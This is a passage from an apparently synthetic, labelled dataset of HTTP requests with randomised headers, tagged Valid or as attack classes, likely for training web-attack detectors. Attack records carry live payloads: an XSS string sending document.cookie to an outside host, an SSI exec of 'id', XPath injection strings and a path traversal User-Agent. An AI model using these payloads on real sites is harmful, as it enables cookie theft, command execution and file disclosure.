Authorization: Digest response="d38B9cBcF3f05A60Cf9CbD2a17AcDfD4"
Range: -97243,-59
Referer: http://sIsctn.net/fcrfgYr.php3
TE: deflate
Trailer: Referer
User-Agent: dHeuema/2.3.6.3
UA-CPU: x86
UA-Disp: 266,600,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6340x801
Via: HTTP/3.7 255.69.246.147, 9.6 159.62.161.17, 3.1 www.Typlho.htm
Transfer-Encoding: garnvf
Upgrade: aCrv/3.2, uNt/4.1, agThej/0.7
Warning: 189 www.tsXitt6.gif "8U5tatshea" 
X-Forwarded-For: 26.9.191.248
X-Serial-Number: 07654558799930280172
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

4hd_2h=peteelintmd

End - Id: 5570
Start - Id: 6214
class: Valid
POST /iNu/fqkvan/aYPyKYLl4pWMt/3c89seeOo/KlogcBxw0arsK/r@U9.5klzfnO/no6O9l.pl? HTTP/1.1
Content-Length: 27
Content-Language: ocsct
Content-Encoding: compress
Content-Location: http://tlTnq.st/raoeniap.rar
Content-MD5: RXI2dWVUYWxtZW1CbXJNcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Dec 07 19:15:24 CET
Last-Modified: Fri, 16 Jan 09 23:24:39 CET
Host: 20.93.118.193:0
Connection: close
Accept: image/*;q=0.9, video/mpeg
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 49.235.62.5
Cookie: dl3nnTyzRinDo=qntcBKseae0ymk
Cookie2: $Version="4"
Date: Thu, 30 Apr 09 03:24:04 GMT
ETag: W/"vrmFbeO_tjP@gxn0eL"
Expect: 100-continue
From: ooIos@tieeEwsrcr.de
If-Modified-Since: Tue, 12 Oct 04 16:41:52 CET
If-Unmodified-Since: Thu, 15 May 08 14:23:36 CET
If-Match: *
If-None-Match: *
If-Range: "Af7g8uOMEEOMYEEw1Q_"
Max-Forwards: 663
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic cnJlZWVyYXk6eDNuYnNlZW8=
Authorization: EIEd eOnvph=0yuacswt
Range: 08944-,040-34609
Referer: /18aeoy/caoe.js
TE: trailers,deflate;q=0.4,trailers
Trailer: Trailer
User-Agent: Mozilla/3.0 (Windows; U; Win98 7.0; xe-de; rv:1.2.0) Gecko/60650528
UA-CPU: Sparc
UA-Disp: 5852,332,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 478x1113
Via: 6eupii/3.8 54.122.232.34, FTP/4.5 www.hruhn2tt.png:66715
Transfer-Encoding: compress
Upgrade: hearu/8.5
Warning: 502 www.tuiesn.jpg:49189 "yihldehotit" 
X-Forwarded-For: 108.165.196.92
X-Serial-Number: 3711226
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

e1berntoko=adpMmV@@zFS.

End - Id: 6214
Start - Id: 49498
class: XPathInjection
GET /1i/mercSr/0Y4p-q87HfQirc4/ebk/tEnnnadluxitru/sioerrJeif7s/hcxXkZ17KP/ipiYFVeE-nr87okB@/g2mesPavefte/hh4M33QXjtI-group byK5/cZ.Ke7Tia.js?inpAKVE2@=nIIapjg0JeKl&0tl5sct=wF%24&tQQ3VSZ=et3&9o=%28i+%3C++count%28o3Nty%2Fchild%3A%3Atext%28%29%29++++and+++++j+%3C++++count%28oio%2Fchild%3A%3Acomment%28%29%29+++and++++k+++++%3C+count%28fLT%2Fchild%3A%3A*%29+++%29&1usm1Ohqt=tSG3CW&eewrwruneoeoiie=ostneklinkoyrcpV%29+n+a&ssa4fpvo=011 HTTP/1.0
Host: www.hvAuht.de
Connection: saeob
Accept: image/gif, video/quicktime
Accept-Charset: *
Accept-Encoding: deflate, compress
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 223.242.155.63
Cookie: hANTYB=aos3tDloe;yNos3ahnt6v8eli=035_B3QVO5Z0;cmdmLfaVlibgwherereplace=2200561231;@qdCOunc@2Dw=yz
Cookie2: $Version="238"
Date: Fri, 25 Nov 05 17:18:12 UTC
ETag: "Pcv9xX0C1jYW.QIrMfv"
Expect: 100-continue
From: amlp2vta@vfese.gov
If-Modified-Since: Thu, 08 Nov 07 10:37:50 CET
If-Unmodified-Since: Sun, 23 Jul 06 20:11:33 GMT
If-Match: "w7U_LuQnnG@u_ZoyO"
If-None-Match: "tr@ntGfAVWpiwHgFri"
If-Range: Thu, 07 Jul 05 21:22:05 GMT
Max-Forwards: 377
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: oou7tu fstmaHe6=oaua
Authorization: urdmey er4o=atlis
Range: 2-801463,7709-,5-5829
Referer: http://iooomlio.fr/srRleJ.swf
TE: gzip;q=0.5
Trailer: Authorization
User-Agent: Mozilla/4.2 (Machintosh; U; PPC Mac OS X 2.9; it-5e; rv:6.7.7) Gecko/99884876
UA-CPU: 68000
UA-Disp: 4263,349,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 527x1451
Via: 7.6 171.145.143.112, FTP/0.0 15.145.31.115
Transfer-Encoding: rTe7; iemnm=htin
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 410 www.st6tgso.css "mdhmtyeir8nd" "Tue, 20 Jul 04 04:31:53 CET"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49498
Start - Id: 9298
class: Valid
GET /5TKr1bV0vsRp7/toadroyTe/crO3e1mrygtumsai/rerunidjw2or/apohsnktOuEghhot/da8a6t6hs4/4I_xHW/uI6kyD.asmx?cl05=A%27O&elai4G=1rTunS0ne&yBaXMPG9y=d8h6eh+tiehh HTTP/1.1
Host: 20.37.123.189:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-1258, x-mac-ce
Accept-Encoding: gzip;q=0.8, gzip;q=0.5
Accept-Language: aVrte-erIq, ft-t, u5Sse-0gaEye;q=0.2, h-tov;q=0.1, Sheit-h
Cache-Control: only-if-cached
Client-ip: 201.8.180.111
Cookie: taYltt3tani=8;kari7lhhosuS=255376;eewa=1le;ntw1Aj6Ruon=c det
Cookie2: $Version="35"
Date: Mon, 19 Feb 07 06:52:08 CET
ETag: W/"N9MJ3LQgA0sfWuXi6C"
Expect: ejrw=feEent06;sLesp=hRhwpg
From: clbdsbE@ouRcuroAt.it
If-Modified-Since: Sat, 23 Jun 07 02:03:14 GMT
If-Unmodified-Since: Mon, 30 Nov 09 11:58:58 UTC
If-Match: "ef3IaejodxEq_XHwHn"
If-None-Match: "CNVlA7QBoOefG.E"
If-Range: "XiA7c-J4hMXhRyVrUvfA"
Max-Forwards: 5232
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: uwsis atswerih=iylimA
Range: 53-
Referer: /oterbp.mspx
TE: trailers,gzip,gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: me1dSsrdhg6sf8o
UA-CPU: 68000
UA-Disp: 5472,2559,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6875x133
Via: HTTP/0.1 43.43.104.255, gDnd/2.8 www.it02.tiff, tau4/0.3 www.epht.css
Transfer-Encoding: wgeati
Upgrade: ne3a/3.0, ktz/8.6, tsjraE/5.2, hlfe/6.2
Warning: 018 www.Ssi76p.jpeg "nedenrH9ew0rrmthew" "Thu, 13 Sep 07 15:26:18 CET"
X-Forwarded-For: 215.205.82.248
X-Serial-Number: 378312956268
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9298
Start - Id: 3066
class: Valid
GET /n2U.VE81Ew/FntsztHmaYo/2JD.Khd2/migan/lKRfCDNaR5tu.png?r43sdpvitoyeTe=tbjLKCrF.yq&tailc7nqo61teaw=h&biSetot=498512977&serssenxeeGn=4400655446&et0fpdag=8xp_%27%3C%25o%2Fe+nsuxcstyleoix&tZ6as2ethEng=+N&eeA=80&ian8t2=0883245&Eea8mh=r%3Flta%3C&26=De&c0sseaSteeh1b=eheyr&gvWZlpositionTONhttpexec=807147&gelrpunAnornmun=nLRdsjBKBHbj&qtoHiah=5LGtFWFKKBl HTTP/1.1
Host: 151.13.8.76:54
Connection: close
Accept: image/*, application/*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: qhc-hto8ehe, E-uhnA, hoCn1r-o;q=0.1, oehne-amas
Cache-Control: 63mys=srhhpit
Client-ip: 203.1.184.86
Cookie: gu=eRnJ;h7er1aoCmNzuo=777817;betcKxf29A.=4<3mwb=a;lTmsedet= ;qx1-Q@.=h
Cookie2: $Version="440"
Date: Tue, 18 Oct 05 24:28:33 UTC
ETag: "L8zPejW4qcs5OUwj"
Expect: 100-continue
From: aCahNpEs@etrihpeiit.de
If-Modified-Since: Sun, 23 Dec 07 22:19:14 UTC
If-Unmodified-Since: Sun, 21 Jun 09 18:39:42 UTC
If-Match: "bsiwqUl_M4HkbM@p7_"
If-None-Match: *
If-Range: "7WUDosanhQuXoeyFZZ"
Max-Forwards: 312
MIME-Version: 8.9
Pragma: mnt4e=erun
Proxy-Authorization: Digest uri=http://www.i1os.gov/snticue/o7oas/eeeoqf/lala.gif
Authorization: Basic MHI1bTpob2FrZg==
Range: 7328-03,-9
Referer: http://7e8hrt.gov/esi9f.gif
TE: trailers
Trailer: Trailer
User-Agent: aiynm0 (rkPQh5Da)
UA-CPU: Sparc
UA-Disp: 6710,9525,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9081x8193
Via: 7.6 www.rbtR.shtml
Transfer-Encoding: identity
Upgrade: TyHs9i/8.3, tlee/0.2, 3Drt/8.0, nnuEe3/5.2
Warning: 569 www.oeereniu.htm:0303 "atsetrg" "Wed, 17 May 06 18:16:08 CET"
X-Forwarded-For: 54.60.0.87
X-Serial-Number: 79351042472156559
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3066
Start - Id: 47521
class: XSS
GET /tsneeTtavl4ejhanva/o92E8rQ.BsIBl67tqFJ@/anvEMONPbX3.exe?ONersfrRyatd=niKwk5UOgJV&u99=%3Cdiv+onmouseover%3D++++%22+%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.trrageit.com%2Fcgi-bin%2Fllarnt.cgi%27%2Bdocument.cookie%29%3B%5D++++%22+%3E&gErdxensgiq4o=d45&z4yXlqceUstherc=ru+erleposition6rt HTTP/1.0
Host: www.olreWJn8.ch
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-15;q=0.3, iso-8859-8-i;q=0.3, x-mac-chinesesimp;q=0.4, windows-1255, iso-8859-9
Accept-Encoding: 
Accept-Language: jiiPwdan-eoro, IxtcX-nmohvE, aplp-eeeb;q=0.0, i2dd-m, mw01is-fci
Cache-Control: no-store
Client-ip: 2.40.61.206
Cookie: N8At=ifa
Cookie2: $Version="7"
Date: Mon, 18 Dec 06 17:30:27 CET
ETag: "EaAlK23iso.d7ql"
Expect: 100-continue
From: eudn2a@se5tse.com
If-Modified-Since: Thu, 23 Feb 06 15:12:57 GMT
If-Unmodified-Since: Wed, 27 May 09 24:01:32 GMT
If-Match: "GtXlpG9O2ov-7RCxd"
If-None-Match: *
If-Range: *
Max-Forwards: 822
MIME-Version: 0.2
Pragma: aeoratsn='udW'
Proxy-Authorization: solli r3h4i=aotni1
Authorization: RhWi ee78ct=mEc50
Range: 22-,852303-,3-
Referer: /bSfa/ttidsea/sne9atyh/ta4s.mpeg
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: TE
User-Agent: Mozilla/9.2 (Machintosh; U; PPC 3.9; e8-ra; rv:5.1.2) Gecko/44791768
UA-CPU: PowerPC
UA-Disp: 0811,223,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7841x155
Via: FTP/2.1 www.ee22ul.tiff:38547
Transfer-Encoding: identity
Upgrade: atsa/8.3
Warning: 781 255.112.125.38 "ehmjCimcbjUud9qrtdru" 
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47521
Start - Id: 39942
class: SSI
PUT /Mi7ZtZmlikeINKgC_/snssa8lerlirrxotsu/5-LCH.Of1Ax/I5Simgd8QoAfaY/1F3NLO.php4? HTTP/1.1
Content-Length: 88
Content-Language: idntr,ieh
Content-Encoding: identity
Content-Location: http://www.06dtnci.com/g5llrqe/hidnj.asmx
Content-MD5: MGUwYWVlQW5kcmFoZWFvaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Sep 09 12:45:07 UTC
Last-Modified: Fri, 04 Nov 05 03:07:56 CET
Host: www.nspeClz.fr:80
Connection: keep-alive
Accept: video/*;q=0.0, application/*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: zbelch=Qckoo
Cookie: ohachsxiss=eEnqlqnplaaesntgt8;etoms=34;a4raFens=nrimt;mnctecjaont=195061
Cookie2: $Version="98"
Date: Sat, 22 Oct 05 12:41:55 GMT
Expect: acstne=Sh1yt
If-Modified-Since: Fri, 13 Nov 09 19:41:25 UTC
If-Unmodified-Since: Tue, 08 Aug 06 04:06:02 CET
If-Match: *
If-None-Match: "jbFnPUIQs@Tr7oW"
If-Range: Sat, 11 Mar 06 02:49:08 CET
Max-Forwards: 8743
MIME-Version: 0.5
Proxy-Authorization: NTLM MnQ0N3d2bnRjbTF3dGQzdEFha2l0bjlybHhocGxhaGVlbnRsbjhhclI=
Authorization: Digest opaque="drBm"
Range: 1-586
Referer: http://sy6a.net/jH5nuxs/l8ztyfe/Mtyt/liBlr/wpnp.txt
TE: trailers
Trailer: From
User-Agent: 6gaI (h.PYL.i2)
UA-Pixels: 3924x987
Via: 7.1 251.95.169.24, HTTP/1.7 254.249.237.24
Transfer-Encoding: deflate
Upgrade: AWutq/3.3, Ereghm/5.5, aashd/6.2, ypndU4/8.9, Egoa/7.9
X-Serial-Number: 029145604

29kca5rW_F=t&p0a8ei=<! #<!--   #exec    cmd="id"-->&msbodyem0=988968

End - Id: 39942
Start - Id: 16650
class: Valid
GET /etb17ngbhViB_AI.js?snhieerL=6&YpVKQkMy=attia&KFHCWlnY=3256275&Hwta0niapar=6dstot&gY2duk1H0SzI=%5Cd%7Ccnhoirhavingd%3BeR&loh=166&sta50xhrdfws=isRohd7&m-autoexeco=0&aaiesnesAinmx0=lGitiont&seanmlaaI=hRKQqq1FQjn&jedthbiA5gdl=h6&noqge=enLSrh&rsSnesrxo6iKno=eIlocationi HTTP/1.1
Host: www.egcF.ch
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-2022-jp;q=0.5
Accept-Encoding: identity;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 242.14.122.91
Cookie: 6e8e2r=075928;tsrnuse=82392168;os5h0hioeKitle=rmefht;rnr7e=44076812
Cookie2: $Version="281"
Date: Wed, 31 Mar 10 20:12:07 CET
ETag: "c_ZBqiEcehEn2bxb03n"
Expect: 8rOrt
From: 7beimH@indn.it
If-Modified-Since: Fri, 18 Nov 05 05:48:06 UTC
If-Unmodified-Since: Sun, 04 Jan 09 10:21:15 UTC
If-Match: *
If-None-Match: "9e8kPytn0hJEDg9R"
If-Range: Thu, 02 Jun 05 10:34:27 UTC
Max-Forwards: 45
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM dWV1ZXNpcmFzYmxsYjN0dnR6d21SdXRsZHRpaWV0bGFobGF1Z29x
Authorization: hmsefL a2irb=ahntosr
Range: -085,-96748
Referer: /tnb6tL/sexJaa/nePIen/wddo24/tcIe.wmn
TE: gzip,chunked;q=0.9,gzip;q=0.6
Trailer: Warning
User-Agent: Mozilla/1.9 (X11; U; SunOS sun4u 9.5; st-re; rv:0.8.3) Gecko/95489162
UA-CPU: x86
UA-Disp: 950,9201,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5729x0287
Via: 3.0 138.14.121.128:2, 8.8 121.148.94.96, 1.1 www.tn6hp.jpeg
Transfer-Encoding: identity
Upgrade: n3amhi/4.3, hx6It8/3.4, tcc1Ue/2.8
Warning: 890 www.nUiou.jpeg "oe52aLer" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6793102
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16650
Start - Id: 17969
class: Valid
GET /c1Cdefb/d9njdhidyors/uVZHM0.htm?athbid9=ttioij&Wlhah8dtlgGrsr=rows&folv=o%2B&jNfDe8systemYXBV=je2%40Ao6httpadmin%24%3E&i3nroxMeiaaHa=ea4z&rWMSiframevarf=ciTsivasai7a&m3MXhVQ6W=28077946&_6-O7IzmdRl_=579&afaIoih=zanC8uesk&alamotn=16746&brinpltvsntoe=alsw&iOqwfnepi3rni=62010&Fr49samLd=1&nchtaMeirdHe=fees&nrihTslfaiuce=colcnOIacotos HTTP/1.1
Host: 98.192.28.55
Connection: close
Accept: application/*, video/*;q=0.2, text/xml;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eO-kmxtaeg5;q=0.8, iny-8f;q=0.2, jedpc-cn7Sta;q=0.0, 2-5ihcsrni;q=0.7
Cache-Control: 0T=k
Client-ip: 5.124.204.53
Cookie: TmfseoenihnoCt=cCtnfoaama:rf2;swueec=045558;akn=ccSi;trpucmsteeiosa=ehhttpe+i
Cookie2: $Version="5"
Date: Wed, 05 Apr 06 23:18:03 GMT
ETag: W/"6Ji3x4muHJSPtbAphBb"
Expect: rbus
From: iemh1t6e@eoyhyfea.net
If-Modified-Since: Sat, 09 Apr 05 09:02:50 UTC
If-Unmodified-Since: Mon, 06 Apr 09 22:26:49 CET
If-Match: "uyBYpeZEu7XdIL3ZxtP"
If-None-Match: *
If-Range: *
Max-Forwards: 7107
MIME-Version: 1.9
Pragma: Rfs=uhtnm42
Proxy-Authorization: cirE tad6e1h=mHpc
Authorization: Digest algorithm=deenhn
Range: 7-
Referer: /ihgt/cast6dti/ehBlle/wsnmmnNm.gif
TE: trailers,trailers,deflate
Trailer: Via
User-Agent: Mozilla/6.8 (compatible; MSIE 4.4; Linux i586; kocyran; 0fedfk)
UA-CPU: PowerPC
UA-Disp: 5395,1752,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5744x7610
Via: 4.0 100.157.231.133
Transfer-Encoding: gzip
Upgrade: n1e7/2.9, i0t/7.2, at8h/8.4, saae/0.1, F8sw4m/0.9
Warning: 243 www.t3moNn4.shtml:671 "6wh40ksieyhlBiAly" "Thu, 09 Oct 08 24:43:53 CET"
X-Forwarded-For: 58.72.123.218
X-Serial-Number: 16119132
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17969
Start - Id: 48591
class: XPathInjection
PUT /nYU2VZfS0NnE/XGJjsfgf_j-QCW/n3.yQ6B8/teT94k08Ha@exec/thpestidoNaoFheemw2i/ibh4zabsLsT3SKu_NP9/3fxNuMpQTadminS6/cPyGb/ervZ6kK/o0yvgGfPJ./i7tLani/tvIWL9VCXxyRu-9.j.cfm? HTTP/1.1
Content-Length: 205
Content-Language: o,A0T
Content-Encoding: compress
Content-Location: /groqi/paIcoi20/r4co3Na8/o7sss.ace
Content-MD5: U25mbzdsTGV0QXByZW50ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Sep 08 18:22:20 GMT
Last-Modified: Sat, 03 May 08 21:08:06 CET
Host: 20.86.97.26:80
Connection: keep-alive
Accept: audio/x-wav;q=0.5, application/postscript;q=0.1, text/plain
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: hite2i-Tlraf;q=0.1
Cache-Control: no-store
Client-ip: 58.151.109.14
Cookie: yeuoWa=etdd;connectRM_Ix6kUTevalf=36940550;nibseaedN=ojrzi;waTpwecluiotepa=kmIinjrye0eiiv;anehiof=ltpasswdudeleteodubg qsand
Cookie2: $Version="380"
Date: Fri, 23 Feb 07 12:24:19 CET
ETag: W/"g6dEmBv81@mImtM6koU@"
Expect: 100-continue
From: ebiq@eeIse.it
If-Modified-Since: Fri, 12 Aug 05 14:17:39 UTC
If-Unmodified-Since: Fri, 25 Nov 05 10:52:26 UTC
If-Match: *
If-None-Match: "r-cV4nOGbLmGn0hdDQ"
If-Range: Mon, 12 Jun 06 14:46:28 UTC
Max-Forwards: 1
MIME-Version: 0.0
Pragma: x3Sy=lIy2k
Proxy-Authorization: Digest response="7fFB26efC9Fd9d2Aac334296DcDC1b71"
Authorization: Basic N2V6cjphZXVxaWk3
Range: 39-76,5-4266
Referer: http://www.arprro.org/2nrDzfw/9pib/eeEMs/ens8.dll
TE: deflate;q=0.1,trailers
Trailer: Authorization
User-Agent: Mozilla/3.8 (compatible; lrbeoeTdi; Linux i586; Mb0eitiar)
UA-CPU: 68000
UA-Disp: 2986,5659,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 853x5228
Via: 2.9 24.91.144.194, 5.5 www.mh0yoet.js:4646, 7.3 181.187.115.123
Transfer-Encoding: Oocesg; yihiw=2shm8kth
Upgrade: i8OE/3.6, 6xpo/8.4, iodng/7.5, t5Oo/9.1
Warning: 003 60.71.243.7 "olt7lttIl5tS" "Mon, 09 Jun 08 19:36:33 GMT"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 41138293275827237103
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ebiama1aEatos=nizaeSad&sthtlm0=qcodb/8a/dasis/child::node()[   position()=0]   |  t6to/easa/ele/child::text()[position()=69]  or    'ushbp3l'    ='

End - Id: 48591
Start - Id: 27089
class: Valid
GET /eczneiactvt/e95daeboDsnWmL/gXYiVe@0.lM99/b-7qZm8PPDvL6/S6jSK/nltasTf/dzn/5NJ3f_xVJ5LO8-/u-Tpv.7tu/nKGzVh8M09oX8nBeLf3.msf?55S6xede=nwudj&ueunPiwejaot=bn%3DoE&meiosdpifth=rgoBtsnahglmno&ncfstc=oscltoslogaat6een&gaud=sXdk&zg043@lieQ=72689&Ra94Oeoff=7csEaojeeyu&ohiohseieeIass=d%3Fq HTTP/1.0
Host: www.sa71.st
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: windows-1250, macintosh
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 98.218.108.15
Cookie: rbsioi=s594L52;Cv1Q3P4aM.7xterm=t:;a4Asil4eFbeRHo=oAlLRx9AF;utelnc=nnehowwe6 ettfbgmocha$6
Cookie2: $Version="392"
Date: Mon, 15 Jun 09 17:32:02 UTC
ETag: "4fdAs_FjwYl@28wdWS"
Expect: 100-continue
From: itnsu@setpexcoE7.gov
If-Modified-Since: Wed, 17 May 06 19:06:08 GMT
If-Unmodified-Since: Thu, 30 Jun 05 09:56:58 GMT
If-Match: *
If-None-Match: "kT7LzVEXA1pOSMS5H8y"
If-Range: *
Max-Forwards: 37
MIME-Version: 3.1
Pragma: t='NKEe'
Proxy-Authorization: rih6us rdg1z=hibwmd
Authorization: NTLM NG5ibnN1d25sYVRic0VzaGFUc3hhNjE5dU8zdGFldHNmYQ==
Range: 47985-64762,7590-,13-
Referer: http://www.ts0flo.cz/egolw/roH0.mdb
TE: gzip
Trailer: If-None-Match
User-Agent: Mozilla/8.0 (X11; U; SunOS sun4u 6.5; 5s-ir; rv:3.5.0) Gecko/29057055
UA-CPU: Sparc
UA-Disp: 3070,8448,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0161x6638
Via: FTP/2.9 136.202.102.10
Transfer-Encoding: compress
Upgrade: yttNQh/3.9, yfpi4i/1.8, lhrs/6.3, setd/4.5, Eye/5.3
Warning: 529 230.160.218.71 "e0romCrdHUu4" "Thu, 04 Aug 05 21:42:14 CET"
X-Forwarded-For: 38.254.21.15
X-Serial-Number: 0883782422223319
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27089
Start - Id: 44648
class: PathTransversal
GET /2eGKM-@DWE8/m86tei6fwcntaRrmE/OqADL0bAdGjP5P/cShaYRY9BaTP@pB_Eq9x/8tseiga/w5ClRvO/cmceA/tTNQNPH7kQp/r63ap3/eRfcB.ROpkrX0h/errNeqg/dJCuVcG_f-G3qn.jsp?eGwei6e=nnmdeiEdywget%3Daccess_loghoa HTTP/1.0
Host: 72.21.170.126:80
Connection: y3lan
Accept: audio/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eCti-h;q=0.5, bype-ub, riaheb-nQbStab, rnsomq-tO
Cache-Control: min-fresh=7
Client-ip: 134.190.203.154
Cookie2: $Version="00"
Date: Wed, 25 May 05 03:28:01 UTC
ETag: W/"_VFS2wW67gDZE-6or_"
Expect: 100-continue
If-Modified-Since: Mon, 19 Nov 07 15:58:42 GMT
If-Unmodified-Since: Thu, 14 Jul 05 24:56:42 CET
If-Match: "-387LhlsqRmot9T9iUp@"
If-None-Match: *
If-Range: Wed, 20 Aug 08 23:23:48 GMT
Max-Forwards: 1759
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM c3BoZW5heWFsZml0ZVRkdDZmOG90b3Mxcmh0ZW50c2FsaGFvc3R6eW9l
Authorization: Basic N3dEaDh0OmE1c2RoN3M=
Range: 04-,-52547
Referer: /oiau0a/ahcn/zrrd/acmcat.pdf
TE: gzip;q=0.2,chunked;q=0.0,trailers
Trailer: Cache-Control
User-Agent: /./../../.././../.././../.././../../../
UA-CPU: 68000
UA-Disp: 099,001,16
Via: irsvoe/8.0 www.6mtee0.htm:3
Transfer-Encoding: compress
X-Serial-Number: 392112295681679

null

End - Id: 44648
Start - Id: 49352
class: XPathInjection
GET /qpL4aJ5K/hEyz6ede/26s_M1IT9BcrPP4ZM.pl?ancr3mdr=trryass%27%5D++%7C++P++%7C++%2F%2Fuser%5B+++++name%2Ftext%28++++%29+%3D++++%273e&xborqRiwEfesu=recormEcj HTTP/1.1
Host: 43.149.75.185:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1;q=0.3, x-mac-roman
Accept-Encoding: *;q=0.6
Accept-Language: qara-SzlL;q=0.8
Cache-Control: 1c0=mesH
Client-ip: 144.73.134.163
Cookie: asordhw0erhg=a7uan);ra=cXPiX8R;tbd6uuYdhqEi=wRScf;2pftnnaievidE=styleyrI;DOACo=86895;6oatdofpctae3u=whle
Cookie2: $Version="88"
Date: Fri, 12 May 06 03:13:13 CET
ETag: "VgXzljIoer326IDB1Rm"
Expect: nteo1rm=hlxEErme
From: EgerC@tafwi.com
If-Modified-Since: Mon, 22 Oct 07 21:25:10 CET
If-Unmodified-Since: Mon, 21 Nov 05 13:04:21 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 86
MIME-Version: 2.9
Pragma: S0a=hmeef
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: Digest qop=auth
Range: 896-
Referer: /mgidvoos/SfooS2t1/jRty.avi
TE: chunked,chunked;q=0.9
Trailer: Accept-Encoding
User-Agent: Mozilla/0.4 (Machintosh; U; Mac OS X 5.5; so-no; rv:5.0.1) Gecko/10023931
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 953x2070
Via: 3.6 www.icidl6pn.jpeg, 3.4 www.nott.shtml, 8.4 www.8iN5T.htm
Transfer-Encoding: compress
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 168 180.56.143.92 "19ohloeeIes" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49352
Start - Id: 48143
class: XSS
GET /eeMwBJEdAIcXEnn__8p/hFyMi/ztP.YQoid6vHRSI1/ermed/oEE/d5/uet.msf?heja=%3Cinput++++type++%3D+%22++++image+++++%22+++dynsrc++%3D++%22++javascript%3A+++%5Balert+++%28%27nctju%27%29%3B%5D++++%22+++%3E&cl0=1xlwijeus&rj6cm=4r+nr5eezh%5C&chNmaneeEydee7=6rmqpes&bntqygrde=ost%5Dt&ea3tdtS5tQr3mlw=g+&xor=7021&crtweeOt8=NDslogcmpnetcatTn1eaoee&cstyles2W3hb=e8OixO-Rl%40MZ&rtooufstes3=anodeIstdina%2B+2hol HTTP/1.0
Host: 69.79.202.112:83
Connection: keep-alive
Accept: image/png, video/quicktime;q=0.3, video/quicktime;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.5, gzip, identity;q=0.1, compress;q=0.8
Accept-Language: *
Cache-Control: max-stale=453
Client-ip: 103.19.58.154
Cookie: e2vlasnHj= C;ni=z taqlh7hmnh
Cookie2: $Version="618"
Date: Sat, 11 Apr 09 17:51:25 UTC
ETag: W/"pYMgQR5_wNoBX6j"
Expect: fh2IAlI=egbfsrrd
From: terhoe3@ygfzae.st
If-Modified-Since: Mon, 03 Sep 07 02:10:43 GMT
If-Unmodified-Since: Tue, 25 Apr 06 23:49:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: iteOs shsTayq=nesE
Range: -54
Referer: /26n4anut/ntrnrei/e8bsceaE/2yvhlsRe.mpg
TE: trailers,deflate;q=0.1,trailers
